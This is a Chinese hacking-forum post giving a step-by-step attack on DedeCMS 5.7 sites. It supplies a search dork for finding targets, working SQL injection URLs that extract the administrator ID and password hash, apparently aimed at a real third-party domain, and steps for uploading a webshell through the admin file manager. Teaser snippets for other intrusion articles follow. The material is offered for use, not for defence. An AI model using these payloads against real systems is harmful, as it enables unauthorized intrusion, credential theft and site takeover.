织网5.7的漏洞,可任意上传~
搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc
访问/data/admin/ver.txt来查看cms
然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入
通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~
查看网站的版本
code 区域cms /data/admin/ver.txt
查看是否有"朋友 修改",有则存在注入
/member/ajax_membergroup.php?action=post&membergroup=1
帐号
code 区域http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`
去掉前三位和最后一位,得到管理员密码
code 区域/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
扫后台,登录成功
后台页面
模块-文件管理器-文件上传 上传大马
登录webshell
大家第六课讲了,怎样把内部网的的一台设备的端口转发出去,而且明确提出一个难题,假如内部网的一台设备上不了网,可否把它的端口转发出去?回答是能的,用EarthWorm或端口转发专用工具lcx都能够保证...
微软公司的“程序运行控制方法”:AppLocker,管理人员能够十分便捷地开展配备,以操纵客户能够在电子计算机上可运作什么程序流程、安裝什么文档、运作什么脚本制作?网络黑客假如能绕开AppLocke...
先给大伙说一下XSS的技术专业表述吧! 什么叫XSS进攻? 每每程序运行的新网页页面中包括不会受到信赖的、未历经适当认证或转义的数据信息,或是应用能够建立JavaScript 的电脑浏...
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法。 织梦dedecms管理系统后台查找技巧 这个时候大家可以尝试下在地址...
今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接: http://www.xxx.cn/news_list....
原文地址: http://fsecurify.com/how-to-learn-hacking/ 如何学习黑客技术? 这个问题我几乎每天都会在Quora、Facebook、Twitter和现实生活...